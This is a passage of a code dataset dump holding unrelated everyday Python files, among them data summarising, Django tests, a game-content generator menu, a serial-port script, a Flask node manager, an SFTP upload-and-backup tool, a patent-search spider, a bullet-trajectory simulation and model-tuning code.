main()","sub_path":"python/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"223331201","text":"#!/usr/bin/env python3\n#summary.py\nimport sys,os,argparse,csv\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-i\", \"--input\", nargs=\"+\", help=\"Input file(s)\")\nparser.add_argument(\"-n\", \"--num_samples\", nargs=1, type=int, help=\"Number of samples\", required=True)\nparser.add_argument(\"-o\", \"--output\", help=\"Output filename\")\nparser.add_argument(\"-od\", \"--output_dir\", help=\"Output directory\")\n\nargs = parser.parse_args()\n\nfiles = args.input\n\n###########################################################################################################\n# Setup datamatrix\ndatamatrix = [[] for i in range(args.num_samples[0] + 1)]\t\ndatamatrix[0].append(\"sample\")\n\nlines = list()\n###########################################################################################################\n# Iterate over files; sum metrics\nfor file in files:\n\tsys.stdout.write(\"# Summarising file:\\t{}\\n\".format(os.path.basename(file)))\n\trow_num = 0\t\n\tline_num = 0\n\n\t# Create column name based on file name\n\tdatamatrix[0].append(os.path.basename(file))\n\t\n\ttry:\n\t\tinfile = open(file, \"r\")\n\texcept IOError as err:\n\t\tsys.stderr.write(\"Error while opening infile: {}\\n\".format(str(err)))\n\t\tsys.exit(1)\n\n\t# Discard the first line as these are mapping references\n\tinfile.readline()\n\tlines = infile.readlines()\n\n\t# Iterate over each 
line to sum numbers\n\tfor line in sorted(lines): # Sorts on sample name\n\t\trow_num += 1\n\n\t\tline = line.rstrip().split(\"\\t\")\n\n\t\t# Collect all sample names from first file; for now assume it has all samples\n\t\tif file == files[0]:\n\t\t\tdatamatrix[row_num].append(line[0])\n\n\t\t\n\t\tsum_list = [float(i) for i in line[1:]] # Type casting values of list\n\t\t\n\t\t# Check that we are actually writing the correct sample and sum the values\n\t\tif line[0] == datamatrix[row_num][0]:\n\t\t\tdatamatrix[row_num].append(sum(sum_list))\n\t\t\n\t\telse:\n\t\t\t# Align the samples and fill in 0s for datasets with no data for a given sample\n\t\t\talign = row_num\n\t\t\twhile line[0] != datamatrix[align][0]:\n\t\t\t\tdatamatrix[align].append(0) \n\t\t\t\talign += 1\n\n\t\t\tdatamatrix[align].append(sum(sum_list))\n\n\tlines.clear()\n\tinfile.close()\n\n###########################################################################################################\n# Set up outfile name\nif args.output is None:\n\toutname = \"summary_\" + (os.path.basename(args.input[0]).split(\"_\")[-1]).split(\".\")[0] + \".csv\"\nelse:\n\toutname = args.output + \".csv\"\n\n###########################################################################################################\n# Setup output directory\nif args.output_dir is not None:\n\tif args.output_dir.startswith(\"/home/\"):\n\t\toutdir = args.output_dir\n\telse:\t\n\t\toutdir = os.getcwd() + \"/\" + args.output_dir\n\n\tif not os.path.exists(outdir):\n\t\tos.mkdir(outdir)\nelse: \n\toutdir = os.path.dirname(args.input[0]) + \"/summary/\"\n\tif not os.path.exists(outdir):\n\t\tos.mkdir(outdir)\n\noutname = outdir + outname\nsys.stdout.write(\"Writing \\\"{}\\\" to:\\t{}\\n\".format(os.path.basename(outname), outdir))\n###########################################################################################################\n# Print to file\ntry:\n\twith open(outname, \"w+\") as csvfile:\n\t\tcsvwriter = csv.writer(csvfile, delimiter=\"\\t\")\n\t\tcsvwriter.writerows(datamatrix)\n\nexcept IOError as err:\n\tsys.stderr.write(\"Error while opening outfile: {}\\n\".format(str(err)))\n\tsys.exit(1)\n","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"136245420","text":"from decimal import Decimal\n\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.db.utils import IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist, ImproperlyConfigured\nfrom django import forms\n\nfrom django_lindau import config\nfrom django_lindau.models import Settings\nfrom django_lindau.base import Config\nfrom django_lindau.forms import SettingsForm\n\nclass SettingsModel(TestCase):\n\n def test_create_some_settings(self):\n Settings.objects.create(key='foo', value=10.53)\n Settings.objects.create(key='bar', value='abracadabra')\n\n self.assertEqual(Settings.objects.get(key='foo').value, 10.53)\n self.assertEqual(Settings.objects.get(key='bar').value, 'abracadabra')\n\n def test_unique_key(self):\n Settings.objects.create(key='foo', value=10.53)\n with self.assertRaises(IntegrityError):\n Settings.objects.create(key='foo', value='abracadabra')\n\nclass ConfigTest(TestCase):\n\n def setUp(self):\n self.config = Config()\n \n def test_accessing_unregistered_settings(self):\n with self.assertRaises(ImproperlyConfigured):\n self.assertEqual(self.config.doesnt_exist, '')\n\n def 
test_register_setting(self):\n self.config.register(key='foo', default='bar', verbose_name='Test')\n self.assertEqual(self.config.foo, 'bar')\n self.assertEqual(self.config._registry['foo']['verbose_name'], 'Test')\n Settings.objects.filter(key='foo').update(value='test')\n self.assertEqual(self.config.foo, 'test')\n\n def test_invalid_key(self):\n # Cannot register methods or attributes of Config as settings\n with self.assertRaises(ImproperlyConfigured):\n self.config.register(key='register')\n\n with self.assertRaises(ImproperlyConfigured):\n self.config.register(key='_registry')\n\nclass Form(TestCase):\n\n def test_autodiscovered_settings(self):\n '''\n Settings can be registered in a lindau.py file in each app directory (here in the tests package)\n '''\n self.assertEqual(config.name, 'Tim')\n self.assertEqual(config.number, 10)\n self.assertEqual(config.float, 6.66)\n self.assertEqual(config.decimal, Decimal('7.50')) \n self.assertEqual(config.email, 'test@test.com')\n \n def test_default_fields(self):\n form = SettingsForm()\n fields = form.fields\n\n self.assertIsInstance(fields['name'], forms.CharField)\n self.assertIsInstance(fields['number'], forms.IntegerField)\n self.assertIsInstance(fields['float'], forms.FloatField)\n self.assertIsInstance(fields['decimal'], forms.DecimalField)\n self.assertIsInstance(fields['email'], forms.EmailField)\n\n self.assertEqual(fields['email'].label, 'E-Mail')\n \n def test_save_fields(self):\n data = {'number': 10, 'float': 6.66, 'name': 'Max Mustermann', 'decimal': Decimal('7.50'), 'email': 'test@test.com'}\n form = SettingsForm(data=data)\n form.is_valid()\n form.save()\n self.assertEqual(Settings.objects.get(key='name').value, 'Max Mustermann')\n\n def test_wrong_input(self):\n data = {'number': 'wrong input!', 'float': 6.66, 'name': 'Max Mustermann', 'decimal': Decimal('7.50'), 'email': 'test@test.com'}\n form = SettingsForm(data=data)\n form.is_valid()\n self.assertIn('number', form.errors)\n\n def test_set_setting_to_None_and_reinit_form(self):\n data = {'number': '', 'float': 6.66, 'name': 'Max Mustermann', 'decimal': Decimal('7.50'), 'email': 'test@test.com'}\n form = SettingsForm(data=data)\n form.is_valid()\n form.save()\n\n form = SettingsForm()\n self.assertIsInstance(form.fields['number'], forms.IntegerField)\n\nclass View(TestCase):\n\n def test_settings_view(self):\n response = self.client.get(reverse('settings'))\n form = response.context['form']\n self.assertIsInstance(form, SettingsForm)\n\n data = {'number': 10, 'float': 6.66, 'name': 'Max Mustermann', 'decimal': Decimal('7.50'), 'email': 'test@test.com'}\n response = self.client.post(reverse('settings'), data=data)\n self.assertEqual(Settings.objects.get(key='name').value, 'Max Mustermann')\n\n response = self.client.post(reverse('settings'), data={'number': 'wrong input!'})\n self.assertEqual(response.status_code, 200)\n form = response.context['form']\n self.assertIsNotNone(form.errors['number'])","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"66822208","text":"# doskvolMasterGenerator.py\n# A menu interface capable of calling the individual Doskvol generators\n\nimport doskvolBuildingGenerator as building\nimport doskvolDemonGenerator as demon\nimport doskvolGhostgenerator as ghost\nimport doskvolPeopleGenerator as npc\nimport doskvolStreetsGenerator as street\n\n\ndef main():\n while True:\n generator = input(\n 
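# the multi-line string below is the menu the user picks from
            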
\"\"\"\nSelect generator:\n[1] Create common NPC\n[2] Create rare NPC\n[3] Create street description\n[4] Create common building desciption\n[5] Create rare building description\n[6] Create a demon\n[7] Create a ghost\n[8] Quit\n\n\"\"\"\n )\n if generator == \"1\":\n npc.print_person(\"common\")\n\n elif generator == \"2\":\n npc.print_person(\"rare\")\n\n elif generator == \"3\":\n street.print_street()\n\n elif generator == \"4\":\n building.print_building(\"common\")\n\n elif generator == \"5\":\n building.print_building(\"rare\")\n\n elif generator == \"6\":\n demon.print_demon()\n\n elif generator == \"7\":\n ghost.print_ghost()\n\n elif generator == \"8\":\n break\n\n else:\n print(\"Invalid choice. Please try again.\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/doskvolMasterGenerator.py","file_name":"doskvolMasterGenerator.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"151547700","text":"import serial\n \nport = \"COM5\"\nbaud = 115200\n \nser = serial.Serial(port, baud, timeout=0.1)\n # open the serial port\nif ser.isOpen():\n print(ser.name + ' is open...')\n try:\n while(1):\n cmd = \"0x0E 01 01 0x07\\n\"\n ser.write(cmd.encode())\n print(\"TX : \" ,cmd.encode())\n print(\"RX : \" + str(ser.readline(),'utf-8' ))\n except Exception:\n print(\"errror\")\n","sub_path":"MAG3110/mag3110_v01.py","file_name":"mag3110_v01.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"581443699","text":"#!/usr/bin/env python3\n\nfrom _thread import *\nimport random\nimport string\nimport time\nimport socket\nimport json\nfrom flask import *\nfrom threading import *\nimport subprocess\nimport sys\n\nfrom time import sleep\nfrom json import dumps\nfrom kafka import KafkaProducer\n\nfrom models import *\n\nserver_load = {}\napps_load = []\napps_pid = []\nlast_port = 0\n\nwith open('runtime_server.json') as f:\n server_list = json.loads(f.read())\n\napp = Flask(__name__)\n#app.config[\"DEBUG\"] = True\nproducer = KafkaProducer(bootstrap_servers=[\n 'localhost:9092'], value_serializer=lambda x: dumps(x).encode('utf-8'))\n\n\ndef init_servers():\n for x in server_list:\n #app = Flask(__name__)\n # print(json.dumps(x))\n print(x['ip'], x['port'])\n server_load[x['id']] = (\n Server(x['id'], x['ip'], x['port'], x['active'], x['health'], x['applications'], x['username'], x['password']))\n last_port = x['port']\n producer.send(KAFKA_TOPIC_SERVER_LIST, json.dumps(x))\n\n start_new_thread(app.run, (x['ip'], x['port']))\n subprocess.Popen([sys.executable, 'health_probe_service.py'])\n input()\n\n\ndef createNodeServer():\n global last_port\n ip = '127.0.0.1'\n l = len(server_load)\n last_port += 1\n id = ''.join(random.choices(string.ascii_letters + string.digits, k=7))\n server_list.append({'id': id, 'ip': ip, 'port': last_port, 'active': 1,\n 'health': 1, 'applications': 0, 'username': 'test', 'password': 'test'})\n server_load[id] = Server(id, ip, last_port, active=1, health=1,\n applications=0, username='test', password='test')\n\n with open('runtime_server.json', 'w') as f:\n json.dump(server_list, f)\n\n producer.send(KAFKA_TOPIC_SERVER_LIST, json.dumps(x))\n #start_new_thread(app.run, (x['ip'], x['port'], True))\n\n\n@app.route('/fetchDetails')\ndef fetchSensorData():\n if request.method == 'POST':\n return 'Not supported', 401\n x = request.args.get('id')\n if x is None:\n return {'msg': 
'Server ID is absent'}, 400\n if int(x) not in server_load.keys():\n return {'msg': 'Server ID not found'}, 400\n sv = server_load[int(x)]\n return {'ip': sv.ip, 'port': sv.port, 'cpu': sv.cpu, 'ram': sv.ram, 'num_apps': sv.num_apps}, 200\n\n\n@app.route('/')\ndef checkServerHealth():\n if request.method == 'POST':\n return 'Not supported', 401\n return {'msg': 'Server health check successful'}, 200\n\n\n@app.route('/runapp')\ndef runApplication():\n if request.method == 'POST':\n return 'Not supported', 401\n app_id = request.args.get('app_id')\n user_id = request.args.get('user_id')\n sensor_list = request.args.get('sensor_list')\n ram_req = request.args.get('ram_req')\n cpu_req = request.args.get('cpu_req')\n app_path = request.args.get('app_path')\n algo_path = request.args.get('algo_path')\n ip = request.host\n port = request.host\n if app_id is None:\n return {'msg': 'App ID is absent'}, 400\n if user_id is None:\n return {'msg': 'User ID is absent'}, 400\n if app_path is None:\n return {'msg': 'App Path is absent'}, 400\n if algo_path is None:\n return {'msg': 'Algo Path is absent'}, 400\n apps_load.append(Application(app_id, user_id, sensor_list,\n ip, port, ram_req, cpu_req, app_path, algo_path))\n pid = subprocess.Popen([sys.executable, app_path])\n apps_pid.append(pid)\n return {'msg': 'Success'}, 200\n # execute APP\n\n\n@app.route('/stopapp')\ndef stopApplication():\n if request.method == 'POST':\n return 'Not supported', 401\n app_id = request.args.get('app_id')\n user_id = request.args.get('user_id')\n if app_id is None:\n return {'msg': 'App ID is absent'}, 400\n if user_id is None:\n return {'msg': 'User ID is absent'}, 400\n for i in range(0, len(apps_load)):\n ap = apps_load[i]\n if ap.app_id == app_id and ap.user_id == user_id:\n apps_pid[i].terminate()\n apps_load.pop(i)\n apps_pid.pop(i)\n return {'msg': 'Success'}, 200\n return {'msg': 'App ID not found'}, 401\n\n\ninit_servers()\n# if __name__ == '__main__':\n# init_servers()\n# app.run(debug=True)\n","sub_path":"hackathon2/node_manager.py","file_name":"node_manager.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"95544750","text":"import os\n# 命令库\nimport paramiko\n\n# 打包命令 pyInstaller -F upload.py\n\n\n# 从配置文件读取配置\nimport configparser\nconf = configparser.ConfigParser()\nconf.read(\"conf.ini\", encoding='UTF-8')\n\n# 待复制文件列表\nlocalFilePath = conf.get(\"default\", \"localFilePath\") or \"\"\n# 服务器目录路径\nremotePath = conf.get(\"default\", \"remotePath\").split(\",\") or []\n# 备份文件目录\nbackPath = conf.get(\"default\", \"backPath\") or \"\"\n# 服务器地址\nssh_conf = {\n \"hostname\": conf.get(\"default\", \"hostname\") or \"\",\n \"port\": conf.get(\"default\", \"port\") or \"\",\n \"username\": conf.get(\"default\", \"username\") or \"\",\n \"password\": conf.get(\"default\", \"password\") or \"\"\n}\n\n\n# 过滤字符串\ndef normalize(path):\n if not path.endswith(\"/\"):\n path += \"/\"\n path = path.replace(\"\\\\\", \"/\")\n path = path.replace(\"\\n\", \"\")\n return path\n\n\nlocalFilePath = normalize(localFilePath)\nbackPath = normalize(backPath)\nremotePath = [normalize(path) for path in remotePath if(len(str(path)) != 0)]\n\n\n# 获取ssh对象\ndef get_ssh():\n # 首先指定你的私钥在哪个位置(ssh是自动找到这个位置,Python不行,必须指定)\n # private_key = paramiko.RSAKey.from_private_key_file('id_rsa')\n\n # 创建SSH对象\n ssh = paramiko.SSHClient()\n # 允许连接不在know_hosts文件中的主机,否则可能报错:\n # paramiko.ssh_exception.SSHException: Server '192.168.43.140' not found in 
known_hosts\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n # 连接服务器\n try:\n ssh.connect(hostname=ssh_conf.get(\"hostname\"),\n port=ssh_conf.get(\"port\"),\n username=ssh_conf.get(\"username\"),\n password=ssh_conf.get(\"password\"))\n except TimeoutError as e:\n print(\"连接远程服务器超时,请检查连接配置!\")\n\n # stdin:标准输入(就是你输入的命令);\n # stdout:标准输出(就是命令执行结果);\n # stderr:标准错误(命令执行过程中如果出错了就把错误打到这里)\n # stdout和stderr仅会输出一个\n # stdin, stdout, stderr = ssh.exec_command('df')\n\n # 获取命令结果\n # 这个有问题,不显示错误,可以修改一下,先判断stdout有没有值,如果输出没有,就显示错误\n # result = stdout.read().decode()\n\n # 关闭连接\n # ssh.close()\n return ssh\n\n\n# 获取当前的时间\ndef get_current_time(is_chinese=False):\n import time\n import locale\n if not is_chinese:\n return time.strftime('%Y-%m-%d %H:%M:%S')\n elif is_chinese:\n locale.setlocale(locale.LC_CTYPE, 'chinese')\n return time.strftime('%Y年%m月%d日%H时%M分%S秒')\n\n\n# 打印配置信息\nprint(\"待上传文件目录(localFilePath):\"+localFilePath)\nprint(\"远程服务器目录(remotePath):\")\nfor path in remotePath:\n print(path)\nprint(\"配置文件保存目录(backPath):\"+backPath)\nprint(\"服务器连接信息:\")\nfor key, value in ssh_conf.items():\n print('{key}:{value}'.format(key=key, value=value))\nos.system('pause')\n\n# 获取ssh连接对象\nprint(\"---正在连接远程服务器---\")\nssh = get_ssh()\nprint(\"---远程服务器连接成功---\")\nsftp = ssh.open_sftp()\nsucc_count = 0\nerror_count = 0\n\n# 待上传文件\nwait_upload_file_list = []\nfor path, dir_list, file_list in os.walk(localFilePath):\n # 同步的路径\n afterPath = path.replace(localFilePath, \"\")\n # 反斜转正斜\n afterPath = afterPath.replace(\"\\\\\", \"/\")\n\n # 待复制的文件\n for file in file_list:\n filePath = afterPath + \"/\" + file\n wait_upload_file_list.append((localFilePath+filePath, filePath))\n\n# 先做备份\nprint(\"---开始备份服务器文件---\")\nbackPath += get_current_time(True) + \"/\"\n# 目录备份\nfor path in remotePath:\n\n for item in wait_upload_file_list:\n\n localPath = item[0]\n filePath = item[1]\n\n backLocalPath = backPath + path.replace(\"/\", \"#\") + \"/\" + filePath\n # 创建目录\n try:\n if not os.path.exists(os.path.dirname(backLocalPath)):\n os.makedirs(os.path.dirname(backLocalPath))\n except PermissionError as e:\n print(\"创建备份目录失败:权限不足\")\n print(\"---停止运行---\")\n exit(0)\n\n try:\n # path均为带文件后缀,不能是目录,且不能是反斜杠路径\n sftp.get(path + filePath, backLocalPath)\n except FileNotFoundError as e:\n print(\"备份文件[\"+path + filePath+\"]失败,文件不存在\")\n pass\n except PermissionError as e:\n print(\"备份文件[\"+path + filePath+\"]失败,权限不足\")\n print(\"---停止运行---\")\n exit(0)\n\nprint(\"备份完成,备份保存目录:\"+backPath)\nos.system('pause')\nprint(\"---开始上传文件至服务器---\")\n# 上传文件\nfor path in remotePath:\n for item in wait_upload_file_list:\n localPath = item[0]\n filePath = item[1]\n try:\n # 创建远程目录\n remoteDir = os.path.dirname(path + filePath)\n ssh.exec_command(\"mkdir -p \" + remoteDir)\n\n sftp.put(localPath, path + filePath)\n print(\"已上传文件[\"+localPath+\"]至[\"+path + filePath+\"]\")\n except FileNotFoundError as e:\n print(\"失败\")\n print(e)\n error_count += 1\n continue\n except PermissionError as e:\n error_count += 1\n print(\"上传文件[\"+localPath+\"]失败,权限不足\")\n continue\n except Exception as e:\n error_count += 1\n print(\"上传文件[\"+localPath+\"]失败\"+\",错误:\")\n print(e)\n continue\n succ_count += 1\n\nprint(\"上传完毕,成功\" + succ_count.__str__() + \"个,失败\" + error_count.__str__() + \"个\")\n\n# 关闭连接\nssh.close()\n\nos.system('pause')\n","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
+{"seq_id":"455899261","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 25 12:55:12 2019\n\n@author: gustavo\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef secuencia03(n, x):\n phi_nx = 1/(n *np.pi) * (np.sin(n*x)**2/x**2)\n return phi_nx\n\nx = np.linspace(-5, 5, 200)\n\nfor i in [1,2,3]:\n plt.plot(x, secuencia03(i, x), label=\"n = \" + str(i))\n \nplt.title(\"Secuencia delta $\\phi_{n}(x)$\") \nplt.legend(loc=1)\nplt.show()","sub_path":"Tema 2 - Primeras tecnicas de solucion/python/untitled3.py","file_name":"untitled3.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185810016","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__mktime__ = '2018/7/18'\n__author__ = '原之安'\n__filename__ = 'Spider'\n\"\"\"\n\nimport urllib\nimport json\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\nfrom itertools import chain\nfrom multiprocessing import Pool\nimport sys\nimport re\n\n\n#根据searchStr找到dockey\ndef search(searchStr, dp):\n params = urllib.urlencode({'q': searchStr,\n 'dp': dp,\n 'pn': '50'})\n # 'f1': 'TI,PN,AN,PD'})\n search_url = 'http://172.21.201.131:8200/search?'\n res = urllib.urlopen(search_url + params)\n return eval(res.read())\n\n#根据dockey找到全文数据\n\n\n#解析全文JSON\ndef read_json(result_first):\n ll = []\n size = -1\n try:\n json_str = eval(json.dumps(result_first))\n result = json_str['RESULT']\n size = json_str['FOUNDNUM']\n for l in range(len(result)):\n PN = result[l]['PN']\n AN = result[l]['AN']\n # PD = result[l]['PD']\n PD = 'error'\n dockey = {'index': {'_id': PN + '@' + AN + '@' + PD}}\n ll.append(dockey)\n return size, result, ll\n except:\n print(\"error:\" + result_first)\n return size, result, ll\n\n\n#main\ndef store_to_es(date_str):\n\n pattern = re.compile('(?<=>=).*?(?=\\))')\n filename = pattern.search(date_str).group()\n print(filename)\n result_file = open('E:/result/' + filename + '.json', 'a')\n\n dp = 0\n print(date_str)\n es = Elasticsearch(['172.21.201.141:9200'],\n sniff_on_start=True,\n sniff_on_connection_fail=True,\n sniffer_timeout=60\n )\n\n size, doc_list, dockey_list = read_json(search(date_str, dp))\n print(size)\n for i in range(1, int((size / 50) + 2)):\n\n size, doc_list, dockey_list = read_json(search(date_str, i))\n\n store_list = list(chain.from_iterable(zip(dockey_list, doc_list)))\n\n result_file.writelines(str(store_list) + '\\n')\n\n print(store_list)\n\n es.bulk(index='intell_property', doc_type='text_info', body=store_list)\n\n\nif __name__ == '__main__':\n\n p = Pool()\n\n a, b = sys.argv[1].split(',')\n for i in range(int(a), int(b) + 1):\n i = str(i)\n date_str = \"((AD>=\" + i + \"0101) AND (AD<=\" + i + \"0630))\"\n print(date_str)\n p.apply_async(store_to_es, (str(date_str),))\n date_str = \"((AD>=\" + i + \"0701) AND (AD<=\" + i + \"1231))\"\n print(date_str)\n p.apply_async(store_to_es, (str(date_str),))\n\n p.close()\n p.join()\n\n #\n # p = Pool()\n #\n # dates = []\n # date_list = range(1980, 1983)\n #\n # # date_str = \"((AD>=\" + date + \"0101) AND (AD<=\" + date + \"1231))\"\n #\n # for d in date_list:\n # date_str = \"((AD>=\" + d + \"0101) AND (AD<=\" + d + \"1231))\"\n # dates.append(date_str)\n #\n # for date in dates:\n # p.apply_async(store_to_es, (str(date),))\n #\n # p.close()\n # 
p.join()\n","sub_path":"database_Demo/Spider.py","file_name":"Spider.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"530139436","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n def middleNode(self, head: ListNode) -> ListNode:\r\n if head.next == None: # 考虑边界情况\r\n return head\r\n if head.next.next == None:\r\n return head.next\r\n # 定义保留头节点\r\n tmp = head\r\n tmp_list = []\r\n while tmp:\r\n tmp_list.append(tmp.val)\r\n tmp = tmp.next\r\n for _ in range(len(tmp_list)//2): # 循环结束正好到达中间位置\r\n head = head.next\r\n return head\r\n'''\r\n题:\r\n输入:[1,2,3,4,5]\r\n输出:此列表中的结点 3 (序列化形式:[3,4,5])\r\n返回的结点值为 3 。 (测评系统对该结点序列化表述是 [3,4,5])。\r\n注意,我们返回了一个 ListNode 类型的对象 ans,这样:\r\nans.val = 3, ans.next.val = 4, ans.next.next.val = 5, 以及 ans.next.next.next = NULL.\r\n\r\n解:\r\n遍历一遍链表,将其保存在数组tmp_list中,中间结点的索引为len(tmp_list) // 2,将指针移到该位置即可。\r\n'''","sub_path":"876.py","file_name":"876.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"576791104","text":"from datetime import datetime\n\nclass Timer:\n def __init__(self):\n self.started = None\n self.finished = None\n self.elapsed = None\n self.seconds = None\n\n def start(self):\n self.started = datetime.now()\n\n def stop(self):\n self.finished = datetime.now()\n self.elapsed = self.finished-self.started\n sectime = ((self.elapsed.seconds*1000000)+(self.elapsed.microseconds))/1000000.0\n self.seconds = round(sectime,3)\n return self.seconds\n","sub_path":"savman/stopwatch.py","file_name":"stopwatch.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"178706662","text":"import sys, pygame, math\n#pygame.init()\n#pygame.font.init()\n\ndef to_pygame(coords):\n \"\"\"Convert coordinates into pygame coordinates (lower-left => top left).\"\"\"\n return (int(coords[0])), int((height - coords[1]))\n\ndef sin(): return math.ceil(math.sin(math.radians(theta)))\n\ndef cos(): return math.ceil(math.cos(math.radians(theta))) \n\ndef drag(currVel, xDirect):\n calcDrag = (.5 * drag_c * rho * math.pow(currVel, 2) * surface_area)\n if xDirect:\n return calcDrag\n return -1 * ((calcDrag * currVel) / math.fabs(currVel))\n #return calcDrag if xDirect else -1 * (calcDrag * currVel) / math.fabs(currVel)\n\ndef acceleration(currDrag, yDirec): #return gravity + currDrag / mass if yDirec else -1 * currDrag / mass\n if yDirec:\n return gravity + (currDrag / mass)\n return -1 * currDrag / mass\n\ndef velocity(velo, accel): return velo + accel * step\n\ndef position(pos, velo): return pos + velo * step\n\ndef draw_bullet():\n textsurface = myfont.render(toPrint, False, green)\n screen.blit(textsurface, (0,0))\n pygame.draw.circle(screen, green, to_pygame((x, y)), radius)\n pygame.display.update()\ndef base_values():\n global x, y, accel, vel\n x = y = 1\n accel = [0, 0]\n vel = [veloi * cos(), veloi * sin()]\ndef begin_prompt():\n ''' global veloi, surface_area, mass, rho, theta,\n if input(\"Would you like to run a bullet simulation? 
Y to continue: \") == \"Y\" or == \"y\":\n        veloi = input(\"Please enter the muzzle velocity in m/s: \")\n        diameter = input(\"Please enter the caliber or metric diameter as a whole number: \")\n        cal_or_mm = input(\"Caliber or mm?: \") '''\n    return 0\nsize = width, height = 1536, 864\nblack = 0, 0, 0\ngreen = 0, 255, 0\nwhite = 255, 255, 255\n#screen = pygame.display.set_mode(size)\n#pygame.display.set_caption(\"Bullet Model\")\nradius = 2\nx = 1\ny = 1\nmass = .016 #mass in kg\ngravity = -9.81\nsurface_area = 5.78883e-5 #Surface area in meters^2\nrho = 1.225 #density of the air\ntheta = 2 #theta in degrees\nveloi = 951 #m/s\nvel = [veloi * cos(), veloi * sin()] #componentize the velocity at initial point\naccel =[0, 0] #x,y \n#vel = 5\nstep = .004\ndrag_c = .224\n#myfont = pygame.font.SysFont('Helvetica', 20)\ntoPrint = \"x = \" + str(x) + \" y = \" + str(y)\ndata_point = 0\nwhile(y >= 0):\n    print(\"step: \" + str(data_point) + \" x: \" + str(x) + \" y: \" + str(y))\n    print(\"pygame coords: \", to_pygame((x,y)))\n    data_point += 1\n    currDrag = [drag(vel[0], True), drag(vel[1], False)]\n    accel = [acceleration(currDrag[0], False),\n             acceleration(currDrag[1], True)]\n    x = position(x, vel[0])\n    y = position(y, vel[1])\n    vel[0] = velocity(vel[0], accel[0])\n    vel[1] = velocity(vel[1], accel[1])\n    print(str(y))\n    toPrint = \"x = \" + str(x) + \" y = \" + str(y)\n","sub_path":"troubleshoot.py","file_name":"troubleshoot.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"31238400","text":"import os\n\nfrom setuptools import setup, find_packages\n\nfrom pip.req import parse_requirements\n\nROOT = os.path.realpath(os.path.join(os.path.dirname(__file__)))\n__VERSION__ = '1.0.1'\n\nbase_requires = parse_requirements(os.path.join(ROOT, 'requirements', 'setup.txt'), session='hack')\nbase_requires = [str(item.req) for item in base_requires]\n\ntests_requires = parse_requirements(os.path.join(ROOT, 'requirements', 'development.txt'), session='hack')\ntests_requires = [str(item.req) for item in tests_requires]\n\nsetup(\n    name=\"Django Distributed Exporter\",\n    version=__VERSION__,\n    author=\"Stored\",\n    author_email=\"dev@stored.com.br\",\n    url=\"https://github.com/stored/django-dde\",\n    package_dir={'': 'src'},\n    packages=find_packages('src'),\n    description='Empiricus CRM',\n    long_description=open(os.path.join(ROOT, 'README.md'), 'r', encoding='utf8').read(),\n    install_requires=base_requires,\n    setup_requires=base_requires,\n    extras_require={\n        'tests': tests_requires,\n    },\n    zip_safe=True,\n    include_package_data=True,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"557599289","text":"# -*- coding=utf-8 -*-\n\nprint('Importing libraries...')\nimport time\nimport getpass\nimport pandas as pd\nimport sklearn\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\ntime_begin = time.time()\n\n\n# --------------- Load data ---------------------\nDATA_DIR = '../../data/data_4/'\nprint('Loading data...\\nLocation:', DATA_DIR)\n\ntrain_df = pd.read_csv( DATA_DIR + 'train_preprocessed1.csv', encoding='gbk')\n\n# Use the feature-selection results\nsupport = pd.read_csv(DATA_DIR + 'selection_result_rf.csv', encoding='gbk',\n                      header=None, names=['var', 'is_useful'])\npredictors = support[support['is_useful'] == True]['var'].values\ntarget = 'target'\ntrain_df = train_df[predictors].join(train_df[target])\n\nif getpass.getuser()=='stone':\n    train_df=train_df[:2000]\n\nprint('Data shape:', train_df.shape)\n# -------------- END load data ------------------\n\n# ---------- Current best parameters ----------------\ndef get_tuned_rf():\n    return RandomForestClassifier(\n        n_estimators=400,\n        max_features='sqrt',\n        max_depth=19,\n        min_samples_split=5,\n        min_samples_leaf=18,\n        random_state=36,\n        n_jobs=-1)\n\nmodel = get_tuned_rf()\n\n# --------------- Grid search ----------------------\n# 